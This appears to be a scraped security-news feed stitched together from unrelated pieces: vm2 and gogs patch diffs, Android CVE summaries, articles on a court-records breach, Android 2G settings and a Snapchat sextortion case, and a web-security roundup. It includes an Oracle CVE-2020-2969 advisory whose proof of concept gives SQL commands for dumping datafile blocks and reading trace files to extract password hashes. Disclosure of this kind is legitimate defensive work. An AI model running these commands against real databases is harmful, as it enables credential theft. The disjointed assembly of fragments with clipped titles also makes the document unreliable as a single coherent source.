The package vm2 before 3.9.10 are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.



@@ -51,7 +51,10 @@ const { AsyncGeneratorFunction } \= data;  
const localWeakMapGet \= LocalWeakMap.prototype.get; const { get: localWeakMapGet, set: localWeakMapSet } \= LocalWeakMap.prototype;  
function localUnexpected() { return new VMError('Should not happen'); @@ -282,8 +285,8 @@ if (typeof OriginalCallSite === 'function') { } return value(error, sst); }; wrappedPrepareStackTrace.set(value, newWrapped); wrappedPrepareStackTrace.set(newWrapped, newWrapped); localReflectApply(localWeakMapSet, wrappedPrepareStackTrace, \[value, newWrapped\]); localReflectApply(localWeakMapSet, wrappedPrepareStackTrace, \[newWrapped, newWrapped\]); currentPrepareStackTrace \= newWrapped; } })) throw localUnexpected();

CVE-2022-25893: Security fix for issue 444. by XmiliaH · Pull Request #445 · patriksimek/vm2

A Justice Department official testifies to a House committee that the cyberattack is a "significant concern."

Testimony provided by a Justice Department official to the US House of Representatives late last week has revealed that law enforcement is investigating a cyberattack on the federal courts' record-management system, reportedly launched by three hostile nation-states.

Head of the DoJ's National Security Division Matt Olsen told the committee that the incident, first discovered in March, is a "significant concern," according to Reuters.

While unable to offer more specific information about the nations behind the cyberattack, Olsen added his division is focused on China, Russia, Iran, and North Korea, Reuters said.

"While I can't speak directly to the nature of the ongoing investigation of the type of threats that you've mentioned regarding the effort to compromise public judicial dockets, this is of course a significant concern for us given the nature of the information that's often held by the courts," Olsen said during his testimony.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

DoJ: Foreign Adversaries Breach US Federal Court Records

In conditionallyRemoveIdentifiers of SubscriptionController.java, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-181053462

CVE-2021-0644: Android Security Bulletin—September 2021  |  Android Open Source Project

In psi_write of psi.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-148159562References: Upstream kernel

CVE-2020-0110: Android Security Bulletin—May 2020  |  Android Open Source Project

Possible out of bound read due to lack of length check of data while parsing the beacon or probe response in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking

CVE-2021-1948: September 2021 Security Bulletin | Qualcomm

Google has introduced a new security feature in Android 14 that allows IT administrators to disable support for 2G cellular networks in their managed device fleet.
The search giant said it's introducing a second user setting to turn off support, at the model level, for null-ciphered cellular connections.
"The Android Security Model assumes that all networks are hostile to keep users safe from

Mobile Security / Network Attack

Google has introduced a new security feature in Android 14 that allows IT administrators to disable support for 2G cellular networks in their managed device fleet.

The search giant said it's introducing a second user setting to turn off support, at the model level, for null-ciphered cellular connections.

"The Android Security Model assumes that all networks are hostile to keep users safe from network packet injection, tampering, or eavesdropping on user traffic," Roger Piqueras Jover, Yomna Nasser, and Sudhi Herle said.

"Android does not rely on link-layer encryption to address this threat model. Instead, Android establishes that all network traffic should be end-to-end encrypted (E2EE)."

2G networks, in particular, employ weak encryption and lack mutual authentication, rendering them susceptible to over-the-air interception and traffic decryption attacks by impersonating a real 2G tower.

The threat posed by rogue cellular base stations means that it could be weaponized by malicious actors to intercept communication traffic, distribute malware, as well as launch denial-of-service (DoS) and adversary-in-the-middle (AitM) attacks, posing surveillance concerns.

In June 2020, Amnesty International disclosed how a Moroccan journalist was targeted with network injection attacks, likely using a fake cell tower to deliver the Pegasus spyware.

To make matters worse, an adversary could launch a stealthy downgrade attack using advanced cell-site simulators (aka Stingrays) that force the handsets to connect to a 2G network by taking advantage of the fact that all existing mobile devices still feature support for 2G bands.

Google, in an attempt to address some of these concerns, added an option to disable 2G at the modem level with Android 12 in early 2022. As a next logical step, the company is now putting in place a new restriction that prevents a device's ability to downgrade to 2G connectivity.

Also tackled in the upcoming release of the mobile operating system is the risk of null ciphers (non-encrypted mode or GEA0) in commercial networks, which exposes user voice and SMS traffic, including one-time passwords (OTPs) to trivial on-the-fly interception attacks.

The disclosure comes as Google said that it's enabling E2EE for RCS conversations in its Messages app for Android by default for new and existing users, although the company notes that some users may be asked to agree to Terms of Service provided by their carrier network.

It also follows its plans to add support for Message Layer Security (MLS) to the Messages app for interoperability across other messaging services.

While Google has attempted to publicly pressurize Apple into adopting RCS, the iPhone maker appears to be content with iMessage for encrypted messaging. Nor has it expressed any interest in releasing a version of iMessage for Android, forcing users texting between the two operating systems to switch to a third-party messaging alternative.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Android 14 Security Feature: IT Admins Can Now Disable 2G Networks

A college student fell victim to a Snapchat sextortion scheme. With a friend's help, she 'hacked back' and sent him to jail.
The post When a sextortion victim fights back appeared first on Malwarebytes Labs.

When Katie Yates suddenly started receiving nude photos of her friend, Natalie Claus, over on Snapchat, she instantly recognized that Claus had just become a victim of a sextortion attack. She also knew how Claus should respond.

This happened in December 2019 when Claus was a sophomore. Both were students at the State University of New York.

Yates has a story of her own, too. Months before receiving those messages from Claus, she was herself a victim of sexual assault. After reporting the abuse, Yates started receiving abusive messages on social media. Seeing the lack of support from anyone on campus, she explored ways to identify her harasser.

This vigilanteism—Yates taking the matter into her own hands because she’s not getting any help—proved beneficial for Claus. So when Yates asked Claus if she wanted to catch her hacker, Claus said, “Yeah.”

**Hacker posed as “Snapchat Security”**

The case of Claus’s hacker, David Mondore (a chef), actually made headlines around 2020 and 2021. Claus is not his sole victim, and a press release revealed that Mondore was involved in a string of Snapchat hijacking activities from July 2018 to August 2020. During this period, the hacker gained unauthorized access to at least 300 Snapchat accounts, including Claus’s.

This Bloomberg article mentioned that Mondore posed as a “security employee” who warned Claus of an alleged breach of her Snapchat account. The Office of the US Attorney of New York provided more detail on the ruse that tricked Claus into handing over her account to Mondore.

According to Claus, whom the press release refers to as Victim 1, she received a Snapchat message from an acquaintance, whom the press release refers to as Acquaintance 1. The person messaging Victim 1 is actually Mondore using Acquaintance 1’s account.

Acquaintance 1 asked Victim 1 for her Snapchat credentials, so they can use the account to check if another user blocked them. In Snapchat, you can’t see anyone who’s blocking you even when you search for their username or full name. It appears the only way to see who’s blocking who is using another account. Several sites use this tactic.

Clearly, Mondore took advantage of this.

After Victim 1 sent her credentials to Acquaintance 1, Mondore sent Victim 1 a text message via an app anonymizing his actual phone number. The message he sent purportedly came from Snapchat Security, requesting Victim 1 to send the passcode for her “My Eyes Only” folder to verify that Victim 1’s account has been legitimately accessed.

“My Eyes Only” is a secure, encrypted, and private folder within Snapchat where users can save potentially sensitive photos and videos. This can only be accessed with a passcode.

After gaining access to Victim 1’s Snapchat account and her “My Eyes Only” folder, Mondore rinses and repeats. He contacted Victim 1’s contacts using her account, asking for their credentials under the pretense of checking who blocked them.

Mondore also used Claus’s private photos, which she had taken for herself as she attempted to recover from a rape, to gather compromising material from her Snapchat contacts. The message sent out with her nude images says, “Flash me back if we’re besties.” It was sent to 116 people, four of whom responded with explicit photos of themselves.

**“Gotcha”**

Claus hatched a plan to trap her hacker with Yates’s help. Using her own Snapchat account, Yates sent a message to Claus’s account, which Mondore had already controlled by then, saying she had nude images to share, with a URL link made to look like a porn site.

The URL, once clicked, collected the IP address of anyone who accessed it using the Grabify IP Logger website. Not only that, Yates and Claus set up the URL to redirect Mondore to the Wikipedia page for the word “gotcha” instead of the porn site he probably expected.

Mondore, upon seeing the Wikipedia redirect, messaged Yates saying, “What the hell is this?” She then blocked Claus’s account after collecting Mondore’s IP: he was in Manhattan and using an iPhone without a VPN.

Claus sent her police report to the campus police, who then forwarded it to the New York state police. One of the officers then knew who to contact within the FBI. The tip eventually led to Mondore’s arrest. He received a sentence of 6 months jail time.

“It was him being an idiot that did it,” Claus said of her hacker. “When I passed all that information to the FBI, they said, ‘There’s a really good chance that we wouldn’t have caught him without this.'”

Despite what happened to her and the “too light” punishment Mondore received, Claus believes he’s not a monster. “He’s a human,” she told Bloomberg. “That’s what makes it scary.”

When a sextortion victim fights back

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 10 February 2023 at 16:30 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

KeePass has become the latest password manager utility obliged to defend its reputation following the discovery of an alleged vulnerability.

Security researchers warned that it might be possible to set up a trigger that exports everything from the KeePass database in cleartext, before syphoning off secret data. The vulnerability – whose seriousness is disputed – is being tracked as CVE-2023-24055.

As Bleeping Computer reports, KeePass maintains the issue only comes into play in cases where an attacker already has control of a compromised account – in which case it’s ‘game over’ already.

Issues in password managers have been a particular focus for security researchers since a mishandled security incident involving LastPass last year that eventually prompted the vendor to admit encrypted password vaults had leaked.

Master keys for these vaults were not exposed, limiting the scope for harm, but the affair was nonetheless troubling.

The US Cybersecurity and Infrastructure Security Agency (CISA) is pushing plans to require technology manufacturers to make their products secure by design.

CISA director Jen Easterly and executive assistant director Eric Goldstein outlined the proposals in an essay published by Foreign Affairs magazine.

On Thursday, developers of the OpenSSL project released patches covering a variety of vulnerabilities in the encryption library, including a high impact flaw (tracked as CVE-2023-0286). The flaw meant that sophisticated attackers might be able to either read system memory or cause a denial of service on affected systems.

Thursday also brought news that a sysadmin on Reddit had fallen victim to a phishing attack. The social news site admitted that attackers had “gained access to some internal documents, code, and some internal business systems” while stating that it reckoned “Reddit user passwords and accounts are safe”.

The Daily Swig also recently reported that Google has developed proposals to mitigate the impact of prototype pollution (a class of JavaScript vulnerability), how a security researcher hacked into Toyota’s supplier management network, and on a privacy storm involving a new host of popular pen testing tool XSS Hunter since the last edition of Deserialized. You can catch up with the full range of our recent news coverage by visiting The Daily Swig’s homepage.

Here are some more web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web Vulnerabilities**

*   Cisco devices / Technology to deploy application containers/virtual machines directly on devices was flawed because user input for the ‘DHCP Client ID’ option wasn’t sanitized / Disclosed with patch on February 1
*   Dompdf / Critical / URI validation failure on SVG parsing / URI validation can be bypassed on SVG parsing, potentially leading to arbitrary object unserialize on PHP, through the phar URL wrapper / disclosed with patch last week
*   F5 BIG-IP / High / Format string flaw in iControl SOAP allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially, execute arbitrary code / Disclosed with a patch on February 1
*   Jira Service Management Server and Data Center / Critical / Broken authentication / vendor alert and patch issued on February 1
*   Skyhigh Security Secure Web Gateway / High / XSS in single sign-on plugin / Disclosed with a patch on January 26

**Research and attack techniques**

*   A detailed analysis of a remote source disclosure vulnerability in PHP development server offers pointers towards necessary follow-up work. The flaw – which meant that the source code of PHP files was exposed as if they were static files – was resolved, but even so “Shodan queries reveal many exposed instances of the built-in server”, the researchers warn
*   A vulnerability in Zoho ManageEngine’s SAML (Security Assertion Markup Language) implementation – dubbed SAML ShowStopper – leaves enterprise-based SSO (Single-Sign-On) deployments at a heightened risk of attack. Security researcher Khoa Dinh offers a detailed analysis of flaw in warning that any vendors (not just ManageEngine) relying on older versions of xmlsec and xalan might be at similar risk
*   A blog post by Skylight Cyber details common misconfigurations in the SaltStack IT orchestration platform, as encountered in the wild, as well as detailing a “novel template injection technique that can achieve remote code execution on a salt-master (or master-of-masters) server”.
*   Proofpoint has discovered that attackers are using malicious third-party OAuth apps to infiltrate organizations’ cloud environments. “Threat actors satisfied Microsoft’s requirements for third-party OAuth apps by abusing the Microsoft ‘verified publisher’ status,” the security researchers report
*   Researchers from Ermetic have discovered an RCE vulnerability impacting services such as Function Apps, App Service and Logic Apps on Azure cloud. The EmojiDeploy vulnerability was sprung through CSRF against source control management service (SCM) Kudu
*   Security researcher ‘eta’ has successfully reverse-engineered the encoding process for barcodes associated with UK mobile rail tickets. The work allows interested parties to decode their own tickets with a web tool developed by the researcher

**Bug bounty / vulnerability disclosure**

*   Google has expanded its OSS-Fuzz project, a free platform for continuous fuzzing to critical open source projects. The technology, which has helped to identify 8,800 vulnerabilities across 850 projects since its launch in 2016, is getting a boost through the offer of higher financial rewards for contributors that integrate new projects into OSS-Fuzz.
*   Security researcher Youssef Sammouda claimed a $44,500 payout after discovering a security flaw that made it possible to take over Facebook/Oculus accounts. As explained in a technical write-up by Sammouda, the hack relied on First-Party access\_token stealing.

**New open source infosec/hacking tools**

*   Checkmarx has put together a built-to-be-vulnerable API application based on the OWASP top 10 API vulnerabilities. The utility – dubbed c{api}tal – is designed to be a learning and training resource focused on API security.
*   Ronin 2.0 offers a revamped version of a free and Open Source Ruby toolkit for security research and development. The latest version of Ronin, enhanced with new API libraries, contains many different CLI commands and Ruby libraries optimized to carry out a range of tasks including scanning for web vulnerabilities and running exploits.
*   Developers have released a new version of EMBA – an embedded device firmware security analyzer geared to the needs of penetration testers. Its functionality is explained on a GitHub page.
*   SH1MMER, an exploit capable of completely unenrolling enterprise-managed Chromebooks.

**For devs**

*   Developers should check out an informative post on integrating Nuclei, an open-source tool for scanning web applications, into their GitHub CI/CD pipelines
*   SBOM Scorecard offers a tool that helps developers to quantify what a well-generated SBOM looks like, accessing the richness of metadata that can later be queried
*   The precloud utility offers an open source CLI that runs checks on infrastructure as code to catch potential deployment issues. The tool, which offers dynamic tests for infrastructure-as-code, works by “comparing resources in CDK diffs and Terraform Plans against the state of your cloud account”

**More industry news**

*   US standards body NIST (National Institute of Standards and Technology) has launched a new voluntary framework for the management of AI-associated risk. NIST’s AI Risk Management Framework is designed towards “improving the ability to incorporate trustworthiness considerations into the design, development, use, and evaluation of AI products, services, and systems”.
*   Scammers are buying ads on Google promoting fraudulent sites that pose as login portals for password management tool Bitwarden.

**For fun**

Codebreakers have decoded a cache of more than 500 encoded letters written by Mary, Queen of Scots, during her years of captivity between 1578 and 1584.

The code – made up only of graphical symbols – was cracked using a combination of “computerized cryptanalysis, manual code-breaking, and linguistic and contextual analysis”, Ars Technica reports.

The letters were relayed by secret couriers, principally to the French ambassador, Michel de Castelnau. However Elizabeth I’s spymaster, Francis Walsingham, had a mole in the French embassy who gave the spy access to decoded copies of the correspondence.

A paper on the codebreaking work, likely to help historians researching the period, was published by specialist journal Cryptologia.

PREVIOUS EDITION Deserialized web security roundup: ‘Catastrophic cyber events’, another T-Mobile breach, more LastPass problems

Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report, OpenSSL gets patched, and Reddit admits phishing hack

Oracle Database versions 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, and 19c allows for unauthorized access to password hashes by an account with the DBA role.

Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s):         11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Risk Level:                Medium  
Solution Status:           Fixed  
CVE Reference:             CVE-2020-2969  
Base Score:                6.6   
Author of Advisory:        Emad Al-Mousa

*****************************************  
Vulnerability Details:

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.

The presented  scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore

*****************************************  
Proof of Concept (PoC):

This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.

SQL> create user ninja identified by hello_123;

SQL> grant create session to ninja;

SQL> grant dba to ninja;

SQL> alter user ninja default role all;

*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$

SQL> select * from sys.user$;  
select * from sys.user$  
                  *  
ERROR at line 1:  
ORA-01031: insufficient privileges

** I will perform dump to the system data file to gain access to the hashed passwords

SQL> alter system dump datafile 1 block min 210 block max 215;

** Then immediately I will check the generated trace file name using the query:

SQL> select * from v$diag_info where NAME='Default Trace File';

** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';

// the password hash will be exposed in the trace file !

After applying Oracle July 2020 CPU patches- try to re-simulate again:

SQL> create user ninja identified by hello_123;

  SQL> grant create session to ninja;

  SQL> grant dba to ninja;

  SQL> alter user ninja default role all;

  SQL> show user  
USER is "NINJA"

SQL> select * from sys.user$;  
select * from sys.user$  
                  *  
ERROR at line 1:  
ORA-01031: insufficient privileges

  SQL> alter system dump datafile 1 block min 210 block max 215;  
alter system dump datafile 1 block min 210 block max 215  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges

 SQL> select * from v$diag_info where NAME='Default Trace File';

    INST_ID NAME  
---------- ----------------------------------------------------------------  
VALUE  
--------------------------------------------------------------------------------  
    CON_ID  
----------  
         1 Default Trace File  
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc

 SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';

 PAYLOAD  
--------------------------------------------------------------------------------  
Trace file   
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc

 Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production  
Version 19.8.0.0.0  
Build label:    RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702  
ORACLE_HOME:    /oraclex/oradbp05/product/19.3  
System name:    Linux  
Node name:      boba  
Release:        3.10.0-1127.13.1.el7.x86_64  
Version:        #1 SMP Fri Jun 12 14:34:17 EDT 2020

 PAYLOAD  
--------------------------------------------------------------------------------  
Machine:        x86_64  
Instance name: ora5  
Redo thread mounted by this instance: 1  
Oracle process number: 69  
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)

  *** 2020-07-16T11:09:31.240875+03:00

 *** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00  
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00

 PAYLOAD  
--------------------------------------------------------------------------------  
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00  
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00  
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00  
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00

 Error: file 1 can only be dumped with SYSDBA privillege

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://www.oracle.com/security-alerts/cpujul2020verbose.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2969  
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/

Oracle Database Password Hash Unauthorized Access

Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.

@@ -16,16 +16,18 @@ import ( "strings" "time"  
"github.com/pkg/errors" gouuid "github.com/satori/go.uuid" "github.com/unknwon/com"  
"github.com/gogs/git-module"  
"gogs.io/gogs/internal/conf" "gogs.io/gogs/internal/cryptoutil" "gogs.io/gogs/internal/db/errors" dberrors "gogs.io/gogs/internal/db/errors" "gogs.io/gogs/internal/gitutil" "gogs.io/gogs/internal/osutil" "gogs.io/gogs/internal/pathutil" "gogs.io/gogs/internal/process" "gogs.io/gogs/internal/tool" ) @@ -134,7 +136,7 @@ func (repo \*Repository) UpdateRepoFile(doer \*User, opts UpdateRepoFileOptions) ( if opts.OldBranch != opts.NewBranch { // Directly return error if new branch already exists in the server if git.RepoHasBranch(repoPath, opts.NewBranch) { return errors.BranchAlreadyExists{Name: opts.NewBranch} return dberrors.BranchAlreadyExists{Name: opts.NewBranch} }  
// Otherwise, delete branch from local copy in case out of sync @@ -449,11 +451,16 @@ func isRepositoryGitPath(path string) bool { return strings.HasSuffix(path, ".git") || strings.Contains(path, ".git"+string(os.PathSeparator)) }  
func (repo \*Repository) UploadRepoFiles(doer \*User, opts UploadRepoFileOptions) (err error) { func (repo \*Repository) UploadRepoFiles(doer \*User, opts UploadRepoFileOptions) error { if len(opts.Files) \== 0 { return nil }  
// Prevent uploading files into the ".git" directory if isRepositoryGitPath(opts.TreePath) { return errors.Errorf("bad tree path %q", opts.TreePath) }  
uploads, err := GetUploadsByUUIDs(opts.Files) if err != nil { return fmt.Errorf("get uploads by UUIDs\[%v\]: %v", opts.Files, err) @@ -487,7 +494,9 @@ func (repo \*Repository) UploadRepoFiles(doer \*User, opts UploadRepoFileOptions) continue }  
// Prevent copying files into .git directory, see https://gogs.io/gogs/issues/5558. upload.Name \= pathutil.Clean(upload.Name)  
// Prevent uploading files into the ".git" directory if isRepositoryGitPath(upload.Name) { continue }

Search

lenovo warranty check/lookup | check warranty status | lenovo support us